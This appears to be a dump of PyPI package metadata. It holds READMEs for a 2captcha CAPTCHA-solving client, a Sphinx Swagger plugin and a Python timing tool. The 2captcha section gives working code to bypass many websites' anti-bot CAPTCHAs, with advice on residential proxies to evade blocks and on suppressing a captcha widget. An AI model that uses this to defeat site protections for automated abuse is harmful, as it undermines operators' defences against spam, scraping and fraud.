from twocaptcha import TwoCaptcha
solver = TwoCaptcha('YOUR_API_KEY')
```
<details>
<summary>Async</summary>
```python
from twocaptcha import AsyncTwoCaptcha
solver = AsyncTwoCaptcha('YOUR_API_KEY')
```
</details>
Also, there are a few options that can be configured:
```python
config = {
'server': '2captcha.com',
'apiKey': 'YOUR_API_KEY',
'softId': 123,
'callback': 'https://your.site/result-receiver',
'defaultTimeout': 120,
'recaptchaTimeout': 600,
'pollingInterval': 10,
'extendedResponse': False
}
solver = TwoCaptcha(**config)
```
### TwoCaptcha instance options
| Option | Default value | Description |
| ---------------- | -------------- |--------------------------------------------------------------------------------------------------------------------------------------------------------|
| server | `2captcha.com` | API server. You can set it to `rucaptcha.com` if your account is registered there |
| softId | 4580 | your software ID obtained after publishing in [2captcha software catalog] |
| callback | - | URL of your web server that receives the captcha recognition result. The URL should be first registered in [pingback settings] of your account |
| defaultTimeout | 120 | Polling timeout in seconds for all captcha types except reCAPTCHA. Defines how long the module tries to get the answer from the `res.php` API endpoint |
| recaptchaTimeout | 600 | Polling timeout for reCAPTCHA in seconds. Defines how long the module tries to get the answer from the `res.php` API endpoint |
| pollingInterval | 10 | Interval in seconds between requests to the `res.php` API endpoint. Setting values less than 5 seconds is not recommended |
| extendedResponse | None | Set to `True` to get the response with additional fields or in more practical format (enables `JSON` response from `res.php` API endpoint). Suitable for [ClickCaptcha](#clickcaptcha), [Canvas](#canvas) |
> [!IMPORTANT]
> Once `callback` is defined for the `TwoCaptcha` instance, all methods return only the captcha ID and DO NOT poll the API to get the result. The result will be sent to the callback URL.
To get the answer manually, use the [get_result method](#send--get_result).
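The `defaultTimeout` and `pollingInterval` options describe a simple polling loop against the answer endpoint. A minimal sketch of that behaviour, where `fetch` stands in for the module's call to the `res.php` endpoint (illustrative, not the library's actual code):

```python
import time

def poll_for_result(fetch, timeout: int = 120, interval: int = 10):
    """Poll until fetch() returns a result or the timeout expires."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        result = fetch()
        if result is not None:
            return result
        time.sleep(interval)
    raise TimeoutError("captcha was not solved within the timeout")

# Simulated endpoint that answers on the third request
answers = iter([None, None, "solved-code"])
print(poll_for_result(lambda: next(answers), timeout=5, interval=0))
```

With a `callback` configured, this loop is skipped entirely and the result is pushed to your server instead.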
## Solve captcha
When you submit any image-based CAPTCHA, you can provide additional options to help 2captcha workers solve it properly.
### Captcha options
| Option | Default Value | Description |
| ------------- | ------------- | -------------------------------------------------------------------------------------------------- |
| numeric | 0 | Defines if the captcha contains numeric or other symbols [see more info in the API docs][post options] |
| minLen | 0 | minimal answer length |
| maxLen | 0 | maximum answer length |
| phrase | 0 | defines if the answer contains multiple words or not |
| caseSensitive | 0 | defines if the answer is case sensitive |
| calc | 0 | defines captcha requires calculation |
| lang | - | defines the captcha language; see the [list of supported languages] |
| hintImg | - | an image with a hint shown to workers with the captcha |
| hintText | - | hint or task text shown to workers with the captcha |
Below, you can find basic examples for every captcha type. Check out [examples directory] for more examples with all available options.
### Normal Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_normal_captcha)</sup>
To bypass a normal captcha (distorted text on an image), use the following method. This method can also be used to recognize any text in an image.
```python
result = solver.normal('path/to/captcha.jpg', param1=..., ...)
# OR
result = solver.normal('https://site-with-captcha.com/path/to/captcha.jpg', param1=..., ...)
```
### Audio Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#audio)</sup>
Use the following method to bypass an audio captcha (MP3 format only).
You must provide the language, e.g. `lang='en'`. Supported languages are "en", "ru", "de", "el", "pt", "fr".
```python
result = solver.audio('path/to/captcha.mp3', lang = 'lang', param1=..., ...)
# OR
result = solver.audio('https://site-with-captcha.com/path/to/captcha.mp3', lang = 'lang', param1=..., ...)
```
### Text Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_text_captcha)</sup>
This method can be used to bypass a captcha that requires answering a question provided in clear text.
```python
result = solver.text('If tomorrow is Saturday, what day is today?', param1=..., ...)
```
### reCAPTCHA v2
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_recaptchav2_new)</sup>
Use the following method to solve reCAPTCHA V2 and obtain a token to bypass the protection.
```python
result = solver.recaptcha(sitekey='6Le-wvkSVVABCPBMRTvw0Q4Muexq1bi0DJwx_mJ-',
url='https://mysite.com/page/with/recaptcha',
param1=..., ...)
```
### reCAPTCHA v3
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_recaptchav3)</sup>
This method provides a reCAPTCHA V3 solver and returns a token.
```python
result = solver.recaptcha(sitekey='6Le-wvkSVVABCPBMRTvw0Q4Muexq1bi0DJwx_mJ-',
url='https://mysite.com/page/with/recaptcha',
version='v3',
param1=..., ...)
```
### FunCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_funcaptcha_new)</sup>
FunCaptcha (Arkoselabs) solving method. Returns a token.
```python
result = solver.funcaptcha(sitekey='6Le-wvkSVVABCPBMRTvw0Q4Muexq1bi0DJwx_mJ-',
url='https://mysite.com/page/with/funcaptcha',
param1=..., ...)
```
### GeeTest
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_geetest)</sup>
Method to solve GeeTest puzzle captcha. Returns a set of tokens as JSON.
```python
result = solver.geetest(gt='f1ab2cdefa3456789012345b6c78d90e',
challenge='12345678abc90123d45678ef90123a456b',
url='https://www.site.com/page/',
param1=..., ...)
```
### GeeTest v4
<sup>[API method description.](https://2captcha.com/2captcha-api#geetest-v4)</sup>
Use this method to solve GeeTest v4. Returns the response in JSON.
```python
result = solver.geetest_v4(captcha_id='e392e1d7fd421dc63325744d5a2b9c73',
url='https://www.site.com/page/',
param1=..., ...)
```
### Lemin Cropped Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#lemin)</sup>
Use this method to solve the Lemin captcha. Returns JSON with an answer containing the following values: answer, challenge_id.
```python
result = solver.lemin(captcha_id='CROPPED_1abcd2f_a1234b567c890d12ef3a456bc78d901d',
div_id='lemin-cropped-captcha',
url='https://www.site.com/page/',
param1=..., ...)
```
### Yandex Smart
Use this method to solve Yandex Smart Captcha. Returns JSON with the token.
```python
result = solver.yandex_smart(sitekey='0x1AAAAh45AAAAkg0s2VIOD34y5hy4h4h',
url='http://mysite.com/',
proxy={'type': 'HTTPS', 'uri': 'login:password@IP_address:PORT'},
userAgent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36')
```
### Cloudflare Turnstile
<sup>[API method description.](https://2captcha.com/2captcha-api#turnstile)</sup>
Use this method to solve Cloudflare Turnstile. Returns JSON with the token.
```python
result = solver.turnstile(sitekey='0x1AAAAAAAAkg0s2VIOD34y5',
url='http://mysite.com/',
data='foo',
pagedata='bar',
action='challenge',
useragent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36')
```
### Amazon WAF
<sup>[API method description.](https://2captcha.com/2captcha-api#amazon-waf)</sup>
Use this method to solve Amazon WAF Captcha (also known as AWS WAF Captcha), which is part of Intelligent Threat Mitigation for AWS. Returns JSON with the token.
```python
result = solver.amazon_waf(sitekey='0x1AAAAAAAAkg0s2VIOD34y5',
iv='CgAHbCe2GgAAAAAj',
                           context='9BUgmlm48F92WUoqv97a49ZuEJJ50TCk9MVr3C7WMtQ0X6flVbufM4n8mjFLmbLVAPgaQ1Jydeaja94iAS49ljb+sUNLoukWedAQZKrlY4RdbOOzvcFqmD/ZepQFS9N5w15Exr4VwnVq+HIxTsDJwRviElWCdzKDebN/mk8/eX2n7qJi5G3Riq0tdQw9+C4diFZU5E97RSeahejOAAJTDqduqW6uLw9NsjJBkDRBlRjxjn5CaMMo5pYOxYbGrM8Un1JH5DMOLeXbq1xWbC17YSEoM1cRFfTgOoc+VpCe36Ai9Kc=',
                           url='https://non-existent-example.execute-api.us-east-1.amazonaws.com/latest',
param1=..., ...)
```
### KeyCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_keycaptcha)</sup>
Token-based method to solve KeyCaptcha.
```python
result = solver.keycaptcha(s_s_c_user_id=10,
s_s_c_session_id='493e52c37c10c2bcdf4a00cbc9ccd1e8',
s_s_c_web_server_sign='9006dc725760858e4c0715b835472f22-pz-',
s_s_c_web_server_sign2='2ca3abe86d90c6142d5571db98af6714',
url='https://www.keycaptcha.ru/demo-magnetic/',
param1=..., ...)
```
### atbCAPTCHA
<sup>[API method description.](https://2captcha.com/2captcha-api#atb-captcha)</sup>
Use this method to solve an atbCAPTCHA challenge. Returns a token to bypass the captcha.
```python
result = solver.atb_captcha(app_id='af25e409b33d722a95e56a230ff8771c',
api_server='https://cap.aisecurius.com',
url='http://mysite.com/',
param1=..., ...)
```
### Capy
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_capy)</sup>
Token-based method to bypass Capy puzzle captcha.
```python
result = solver.capy(sitekey='PUZZLE_Abc1dEFghIJKLM2no34P56q7rStu8v',
url='http://mysite.com/',
api_server='https://jp.api.capy.me/',
param1=..., ...)
```
### Grid
<sup>[API method description.](https://2captcha.com/2captcha-api#grid)</sup>
The grid method was originally called the Old reCAPTCHA V2 method. It can be used to bypass any type of captcha where you can apply a grid to an image and click specific grid boxes. Returns the numbers of the boxes.
```python
result = solver.grid('path/to/captcha.jpg', param1=..., ...)
```
### Canvas
<sup>[API method description.](https://2captcha.com/2captcha-api#canvas)</sup>
The canvas method can be used when you need to draw a line around an object on an image. Returns a set of points' coordinates to draw a polygon.
```python
result = solver.canvas('path/to/captcha.jpg', param1=..., ...)
```
### ClickCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#coordinates)</sup>
The ClickCaptcha method returns the coordinates of points on the captcha image. It can be used if you need to click on particular points in the image.
```python
result = solver.coordinates('path/to/captcha.jpg', param1=..., ...)
```
### Rotate
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_rotatecaptcha)</sup>
This method can be used to solve a captcha that asks to rotate an object. It is mostly used to bypass FunCaptcha. Returns the rotation angle.
```python
result = solver.rotate('path/to/captcha.jpg', param1=..., ...)
```
### MTCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#mtcaptcha)</sup>
Use this method to solve MTCaptcha and obtain a token to bypass the protection.
```python
result = solver.mtcaptcha(sitekey='MTPublic-KzqLY1cKH',
url='https://2captcha.com/demo/mtcaptcha',
param1=..., ...)
```
### Friendly Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#friendly-captcha)</sup>
Friendly Captcha solving method. Returns a token.
> [!IMPORTANT]
> To successfully use the received token, the captcha widget must not be loaded on the page. To achieve this, you need to abort the request to `/friendlycaptcha/...module.min.js` on the page. If the captcha widget is already loaded on the page, there is a high probability that the received token will not work.
```python
result = solver.friendly_captcha(sitekey='FCMGEMUD2KTDSQ5H',
url='https://friendlycaptcha.com/demo',
param1=..., ...)
```
### Cutcaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#cutcaptcha)</sup>
Use this method to solve Cutcaptcha. Returns the response in JSON.
```python
result = solver.cutcaptcha(misery_key='ad52c87af17e2ec09b8d918c9f00416b1cb8c320',
apikey='SAs61IAI',
url='https://mysite.com/page/with/cutcaptcha',
param1=..., ...)
```
### Tencent
<sup>[API method description.](https://2captcha.com/2captcha-api#tencent)</sup>
Use this method to solve Tencent captcha. Returns a token.
```python
result = solver.tencent(app_id="197326679",
url="https://mysite.com/page/with/tencent",
param1=..., ...)
```
### DataDome
<sup>[API method description.](https://2captcha.com/2captcha-api#datadome)</sup>
Use this method to solve DataDome captcha.
> [!IMPORTANT]
> To solve the DataDome captcha, you must use a proxy. It is recommended to use [residential proxies].
```python
result = solver.datadome(captcha_url="https://geo.captcha-delivery.com/captcha/?initialCid=...",
pageurl="https://mysite.com/page/with/datadome",
userAgent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36",
proxy={
'type': 'HTTP',
'uri': 'login:password@IP_address:PORT'
},
param1=..., ...)
```
### VKImage
<sup>[API method description.](https://2captcha.com/2captcha-api#vkcaptcha)</sup>
This method can be used to solve the graphical VK captcha. Returns the number of steps and the solution value in the target site's API format.
```python
result = solver.vkimage('path/to/captcha.jpg', steps='[5,4,7,7,14,22,8,...]', ...)
```
### VKCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#vkcaptcha)</sup>
This method can be used to solve VK Captcha using a token. Returns a token.
> [!IMPORTANT]
> To solve the VK Captcha, you must use a proxy. It is recommended to use [residential proxies].
```python
result = solver.vkcaptcha(redirect_uri='https://id.vk.ru/...',
userAgent='Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36..',
proxy={
'type': 'HTTP',
'uri': 'login:password@IP_address:PORT'}
)
```
### CaptchaFox
<sup>[API method description.](https://2captcha.com/2captcha-api#captchafox)</sup>
This method can be used to solve CaptchaFox using a token. Returns a token.
```python
result = solver.captchafox(sitekey='sk_ILKWNruBBVKDOM7dZs59KHnDLEWiH',
pageurl='https://mysite.com/page/with/captchafox',
userAgent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
proxy={'type': 'HTTPS',
'uri': 'login:password@IP_address:PORT'})
```
### Prosopo
<sup>[API method description.](https://2captcha.com/2captcha-api#prosopo-procaptcha)</sup>
This method can be used to solve Prosopo captcha using a token. Returns a token.
```python
result = solver.prosopo(sitekey='5EZVvsHMrKCFKp5NYNoTyDjTjetoVo1Z4UNNb1DkVLS0JbqR',
pageurl='https://mysite.com/page/with/prosopo'
)
```
### Temu
<sup>[API method description.](https://2captcha.com/ru/2captcha-api#temucaptcha)</sup>
This method can be used to solve Temu captcha. Returns coordinates.
```python
result = solver.temu(body="data:image/png;base64,iVBORw0KG...",
part1="data:image/png;base64,iVBORw0KG...",
part2="data:image/png;base64,iVBORw0KG...",
part3="data:image/png;base64,iVBORw0KG...")
```
### CyberSiARA
<sup>[API method description.](https://2captcha.com/2captcha-api#cybersiara)</sup>
Use this method to solve CyberSiARA. Returns a token.
```python
result = solver.cybersiara(master_url_id='tpjOCKjjpdzv3d8Ub2E9COEWKt1vl1Mv',
pageurl='https://demo.mycybersiara.com/',
userAgent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36',
param1=..., ...)
```
## Other methods
### send / get_result
These methods can be used for manual captcha submission and answer polling. The `send()` method supports sending any captcha
type; to specify the type, pass the `method` value manually, for example `method='recaptcha'` for solving reCAPTCHA.
You can find the value of the `method` parameter in the [API documentation](https://2captcha.com/2captcha-api).
Example for solving Normal captcha manually:
```python
import time
. . . . .
id = solver.send(file='path/to/captcha.jpg')
time.sleep(20)
code = solver.get_result(id)
```
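A fixed `time.sleep(20)` may be too short for harder captchas or needlessly long for easy ones. A minimal polling sketch, in pure Python — here `fetch_result` is a placeholder for a function like `solver.get_result` that raises while the answer is not ready:

```python
import time

def poll(fetch_result, captcha_id, interval=5, timeout=120):
    """Call fetch_result(captcha_id) until it returns a value or the timeout expires."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            return fetch_result(captcha_id)
        except Exception:  # e.g. a "not ready yet" error from the API
            time.sleep(interval)
    raise TimeoutError(f"captcha {captcha_id} not solved within {timeout}s")
```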
### balance
<sup>[API method description.](https://2captcha.com/2captcha-api#additional-methods)</sup>
Use this method to get your account's balance.
```python
balance = solver.balance()
```
### report
<sup>[API method description.](https://2captcha.com/2captcha-api#complain)</sup>
Use this method to report good or bad captcha answers.
```python
solver.report(id, True) # captcha solved correctly
solver.report(id, False) # captcha solved incorrectly
```
## Error handling
In case of an error, the captcha solver throws an exception. It's important to properly handle these cases. We recommend using `try`/`except` to handle exceptions.
The list of all errors can be found in the [API documentation](https://2captcha.com/2captcha-api#list-of-inphp-errors).
```python
try:
result = solver.text('If tomorrow is Saturday, what day is today?')
except ValidationException as e:
# invalid parameters passed
print(e)
except NetworkException as e:
# network error occurred
print(e)
except ApiException as e:
    # API responded with an error
print(e)
except TimeoutException as e:
    # captcha was not solved in the allotted time
print(e)
```
## Proxies
You can pass your proxy as an additional argument for the following methods: recaptcha, funcaptcha, geetest, geetest v4,
keycaptcha, capy puzzle, lemin, atbcaptcha, turnstile, amazon waf, mtcaptcha, friendly captcha, cutcaptcha, Tencent, DataDome, cybersiara.
The proxy will be forwarded to the API to solve the captcha.
We have our own proxies that we can offer you. [Buy residential proxies] to avoid restrictions and blocks. [Quick start].
```python
proxy={
'type': 'HTTPS',
'uri': 'login:password@IP_address:PORT'
}
```
## Async calls
To use the async version, just replace `TwoCaptcha` with `AsyncTwoCaptcha`:
```python
import asyncio
from twocaptcha import AsyncTwoCaptcha
async def solve_captcha():
solver = AsyncTwoCaptcha('YOUR_API_KEY')
try:
recaptcha_result = await solver.recaptcha(...)
return recaptcha_result
except Exception as e:
print(e)
return None
if __name__ == '__main__':
result = asyncio.run(solve_captcha())
```
The `AsyncTwoCaptcha` class supports all the same methods and parameters as the synchronous `TwoCaptcha` class but operates asynchronously. Configuration is identical.
### Solving Multiple Captchas in Parallel
One of the main advantages of using async support is the ability to solve multiple captchas concurrently:
```python
async def solve_multiple_captchas():
solver = AsyncTwoCaptcha('YOUR_API_KEY')
# Start all tasks simultaneously
task1 = asyncio.create_task(solver.text('What color is the sky on a clear day?'))
task2 = asyncio.create_task(solver.text('What is 2+2?'))
task3 = asyncio.create_task(solver.text('Name of the planet we live on?'))
# Wait for all tasks to complete
results = await asyncio.gather(task1, task2, task3, return_exceptions=True)
return results
# This completes much faster than solving captchas sequentially
results = asyncio.run(solve_multiple_captchas())
```
Examples of solving all supported captcha types asynchronously are located in the [examples/async directory].
### Legacy Async Method
For backward compatibility, you can also use the traditional executor-based approach with the synchronous client:
```python
import asyncio
import concurrent.futures
from twocaptcha import TwoCaptcha
API_KEY = "YOUR_API_KEY"
image = "data:image/png;base64,iVBORw0KGgoA..."
async def captchaSolver(image):
loop = asyncio.get_running_loop()
with concurrent.futures.ThreadPoolExecutor() as pool:
result = await loop.run_in_executor(pool, lambda: TwoCaptcha(API_KEY).normal(image))
return result
captcha_result = asyncio.run(captchaSolver(image))
```
## Examples
Examples of solving all supported captcha types are located in the [examples] directory.
## Examples using Selenium
We also have a [separate repository](https://github.com/2captcha/captcha-solver-selenium-python-examples) where you can find examples of captcha solving using the [Selenium](https://pypi.org/project/selenium/) library. At the moment it contains examples of bypassing [reCAPTCHA](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/reCAPTCHA), [Cloudflare](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/cloudflare), [Coordinates](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/coordinates), [MTCaptcha](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/mtcaptcha), [normal captcha](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/normal_captcha) (image captcha), and [text captcha](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/text_captcha).
## Useful articles
- Amazon captcha solver: Code example for bypassing the [Amazon captcha](https://2captcha.com/blog/amazon-captcha-solving)
- [Captcha bypass in Selenium](https://2captcha.com/blog/captcha-bypass-in-selenium)
## Get in touch
<a href="mailto:support@2captcha.com"><img src="https://github.com/user-attachments/assets/539df209-7c85-4fa5-84b4-fc22ab93fac7" width="80" height="30"></a>
<a href="https://2captcha.com/support/tickets/new"><img src="https://github.com/user-attachments/assets/be044db5-2e67-46c6-8c81-04b78bd99650" width="81" height="30"></a>
## Join the team 👪
There are many ways to contribute, of which development is only one! Find your next job. Open positions: AI experts, scrapers, developers, technical support, and much more! 😍
<a href="mailto:job@2captcha.com"><img src="https://github.com/user-attachments/assets/36d23ef5-7866-4841-8e17-261cc8a4e033" width="80" height="30"></a>
## License
The code in this repository is licensed under the MIT License. See the [LICENSE](./LICENSE) file for more details.
### Graphics and Trademarks
The graphics and trademarks included in this repository are not covered by the MIT License. Please contact <a href="mailto:support@2captcha.com">support</a> for permissions regarding the use of these materials.
<!-- Shared links for README.md -->
[2Captcha]: https://2captcha.com/
[2captcha software catalog]: https://2captcha.com/software
[pingback settings]: https://2captcha.com/setting/pingback
[post options]: https://2captcha.com/2captcha-api#normal_post
[list of supported languages]: https://2captcha.com/2captcha-api#language
[examples directory]: /examples
[examples/sync directory]: /examples/sync
[examples/async directory]: /examples/async
[asyncio]: https://docs.python.org/3/library/asyncio.html
[Buy residential proxies]: https://2captcha.com/proxy/residential-proxies
[Quick start]: https://2captcha.com/proxy?openAddTrafficModal=true
[examples]: ./examples
[residential proxies]: https://2captcha.com/proxy/residential-proxies
| text/markdown | 2Captcha | info@2captcha.com | null | null | null | 2captcha, captcha, api, captcha solver, reCAPTCHA, FunCaptcha, Geetest, image captcha, Coordinates, Click Captcha, Geetest V4, Lemin captcha, Amazon WAF, Cloudflare Turnstile, Capy Puzzle, MTCaptcha, Friendly Captcha, Tencent, Cutcaptcha, DataDome, VK Captcha, CaptchaFox, Prosopo, cybersiara | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Scientific/Engineering :: Image Recognition",
"Topic :: Utilities",
"Intended Audience :: Developers"
] | [] | https://github.com/2captcha/2captcha-python/ | null | >=3.8 | [] | [] | [] | [
"requests",
"httpx",
"aiofiles"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:10:23.251190 | 2captcha_python-2.0.3.tar.gz | 36,545 | fb/b0/afb4f221ca65a2b8c9ee0849f9c61448110a35c09e65ecdf97e469cf8897/2captcha_python-2.0.3.tar.gz | source | sdist | null | false | 7bb5f3399d0fd34a8b32f0c856cc0797 | 3ed0f79bacdeb24eb3decb842aad63ec58a2df75ec16f1b9dd143cded1c227b0 | fbb0afb4f221ca65a2b8c9ee0849f9c61448110a35c09e65ecdf97e469cf8897 | null | [
"LICENSE"
] | 4,181 |
2.4 | swagger-plugin-for-sphinx | 7.0.0 | Sphinx plugin which renders a OpenAPI specification with Swagger | [](https://api.reuse.software/info/github.com/SAP/swagger-plugin-for-sphinx)
[](https://github.com/psf/black)
[](https://coveralls.io/github/SAP/swagger-plugin-for-sphinx)
# Swagger Plugin for Sphinx
This is a handy plugin to bring [Swagger](https://swagger.io/) and [Sphinx](https://www.sphinx-doc.org/en/master/) together.
It can generate one or more Swagger HTML pages, each hosting an OpenAPI specification with a custom configuration.
## Install
Just run `pip install swagger-plugin-for-sphinx`
## Usage
### Enable the Plugin
First, add the plugin to the extensions list:
```python
extensions = ["swagger_plugin_for_sphinx"]
```
### Global Configuration
Swagger uses two JavaScript files and one CSS file to render the output.
These can be set in ``conf.py``:
```python
swagger_present_uri = ""
swagger_bundle_uri = ""
swagger_css_uri = ""
```
These correspond to the modules explained [here](https://github.com/swagger-api/swagger-ui/blob/master/docs/usage/installation.md).
By default, the latest release is used from [here](https://cdn.jsdelivr.net/npm/swagger-ui-dist@latest).
### Directive
To include a Swagger API specification in an HTML page, specify the `swagger-plugin` directive
and the relative path to the specification:
```code
.. swagger-plugin:: path/to/spec.yaml
```
The spec is automatically copied into the `_static` build output directory.
The directive supports the following options:
* `id`: specifies a unique ID for the specification per page (see below)
* `full-page`: if set, all other content on the page is dropped and only the Swagger part is rendered
* `page-title`: the name of the HTML page if `full-page` is specified
* `swagger-options`: JSON string that is passed to Swagger to enable additional options as described
on the [configuration](https://swagger.io/docs/open-source-tools/swagger-ui/usage/configuration/)
page of the Swagger documentation.
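For example, several of these options can be combined on one directive (the path and option values here are illustrative):

```code
.. swagger-plugin:: path/to/spec.yaml
   :id: my-spec
   :page-title: My API
   :full-page:
   :swagger-options: {"deepLinking": true}
```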
By default, the directive creates a `<div>` element with the ID `swagger-ui-container`.
If you put more than one `swagger-plugin` directive in a file, specify unique IDs:
```code
.. swagger-plugin:: path/to/one.yaml
:id: spec-one
.. swagger-plugin:: path/to/two.yaml
:id: spec-two
```
## Development
This project uses `uv`.
To setup a venv for development use
`python3.14 -m venv venv && pip install uv && uv sync --all-groups && rm -rf venv/`.
Then use `source .venv/bin/activate` to activate your venv.
## Build and Publish
Execute the release action with the proper version.
## Support, Feedback, Contributing
This project is open to feature requests/suggestions, bug reports etc., via [GitHub issues](https://github.com/SAP/swagger-plugin-for-sphinx/issues). Contribution and feedback are encouraged and always welcome. For more information about how to contribute, the project structure, as well as additional contribution information, see our [Contribution Guidelines](CONTRIBUTING.md).
## Code of Conduct
We as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone. By participating in this project, you agree to abide by its [Code of Conduct](CODE_OF_CONDUCT.md) at all times.
## Licensing
Copyright 2025 SAP SE or an SAP affiliate company and swagger-plugin-for-sphinx contributors.
Please see our [LICENSE](LICENSE) for copyright and license information.
Detailed information including third-party components and their licensing/copyright information is available [via the REUSE tool](https://api.reuse.software/info/github.com/SAP/swagger-plugin-for-sphinx).
| text/markdown | null | Kai Harder <kai.harder@sap.com> | null | null | null | sphinx, swagger, plugin, openapi | [
"Development Status :: 5 - Production/Stable",
"Environment :: Plugins",
"Framework :: Sphinx :: Extension",
"Intended Audience :: Developers",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Documentation",
"Topic :: Documentation :: Sphinx",
"Typing :: Typed"
] | [] | null | null | <4,>=3.10 | [] | [] | [] | [
"sphinx<10,>=8.0",
"jinja2~=3.0",
"docutils",
"typing_extensions~=4.5"
] | [] | [] | [] | [
"Changelog, https://github.com/SAP/swagger-plugin-for-sphinx/blob/main/CHANGELOG.md",
"Issue Tracker, https://github.com/SAP/swagger-plugin-for-sphinx/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:10:17.859324 | swagger_plugin_for_sphinx-7.0.0.tar.gz | 106,931 | fc/14/36a4b2172fd6496c646d58dcb11c2877e09cc38e6d206eaa822dad0d0eab/swagger_plugin_for_sphinx-7.0.0.tar.gz | source | sdist | null | false | ce8661cad7f13cd9e6e6b830b0650ff9 | 86a18b9ec1da2b78a80772fbd5d10549bf393b072f07da9edb5d1eaac02b8d44 | fc1436a4b2172fd6496c646d58dcb11c2877e09cc38e6d206eaa822dad0d0eab | Apache-2.0 | [
"LICENSE"
] | 591 |
2.4 | cntimer | 0.1.11 | Automatic execution time and memory tracker for Python scripts — works with VSCode, terminal, and every Python runner automatically. | # cntimer ⏱
[](https://pypi.org/project/cntimer/)
[](https://opensource.org/licenses/MIT)
[](https://www.python.org/downloads/)
[](https://pypi.org/project/cntimer/)
**Automatic execution time and memory tracker for Python scripts.**
No code changes. No config. Just `pip install cntimer` — every script you run will automatically show timing and memory at the end, whether you use VSCode, terminal, or any Python runner.
---
## Install
```bash
pip install cntimer
```
That's it. Every Python script you run will show this automatically:
```
────────────────────────────────────────────────────────────
🕐 Time 0.74 ms (execution: 1.44 s)
📦 Memory 31.2 MB (peak: 62.4 MB)
────────────────────────────────────────────────────────────
```
> ✅ Works in base Python, virtual environments (venv), conda, and pipx — no extra steps needed.
---
## How it works
`cntimer` places a `cntimer.pth` file into your Python's `site-packages` directory. Python automatically reads all `.pth` files on **every startup** — which is what makes tracking work with zero code changes.
When you uninstall with `pip uninstall cntimer`, the `.pth` hook removes itself automatically on the next Python startup — no orphaned files, no errors.
- ✅ Works with VSCode Run button
- ✅ Works in terminal
- ✅ Works in virtual environments (venv, conda, pipx)
- ✅ Works on Windows (x86, x64, ARM64), macOS, Linux
- ✅ No imports needed in your code
- ✅ Cleans up after itself on uninstall
---
## Output explained
| Field | Meaning |
|---|---|
| 🕐 Time | CPU time — actual computation (excludes sleep, I/O, network wait) |
| execution | Total execution time (how long you waited) |
| 📦 Memory | Memory still in use when script finished |
| peak | Highest memory used at any point during execution |
If **execution** is much bigger than **Time**, your script spent time waiting (file I/O, network, sleep).
If they're close, your script is CPU-bound (pure computation).
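The distinction between the two clocks can be reproduced with the standard library alone (a sketch, independent of cntimer):

```python
import time

start_cpu = time.process_time()    # CPU time: actual computation only
start_wall = time.perf_counter()   # wall-clock time: everything, including waiting

time.sleep(0.5)                           # waiting: advances wall time, not CPU time
total = sum(i * i for i in range(10**6))  # computing: advances both clocks

cpu = time.process_time() - start_cpu
wall = time.perf_counter() - start_wall
print(f"CPU: {cpu:.3f} s, wall: {wall:.3f} s")  # wall is roughly 0.5 s larger
```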
---
## Manual install (if auto-install failed)
Find your site-packages path:
```bash
# Mac / Linux
python3 -c "import site; print(site.getsitepackages()[0])"
# Windows
python -c "import site; print(site.getsitepackages()[0])"
```
Then copy the file:
### macOS
```bash
cp cntimer.pth $(python3 -c "import site; print(site.getsitepackages()[0])")/cntimer.pth
```
### Linux
```bash
sudo cp cntimer.pth $(python3 -c "import site; print(site.getsitepackages()[0])")/cntimer.pth
```
### Windows 64-bit / ARM64 — run Command Prompt as Administrator
```
copy cntimer.pth "C:\Program Files\Python3xx\Lib\site-packages\cntimer.pth"
```
### Windows 32-bit — run Command Prompt as Administrator
```
copy cntimer.pth "C:\Program Files (x86)\Python3xx\Lib\site-packages\cntimer.pth"
```
> Replace `3xx` with your Python version (e.g. `312` for Python 3.12).
---
## Uninstall
```bash
pip uninstall cntimer
```
The `.pth` hook removes itself automatically on the next Python startup. No manual cleanup needed.
---
## License
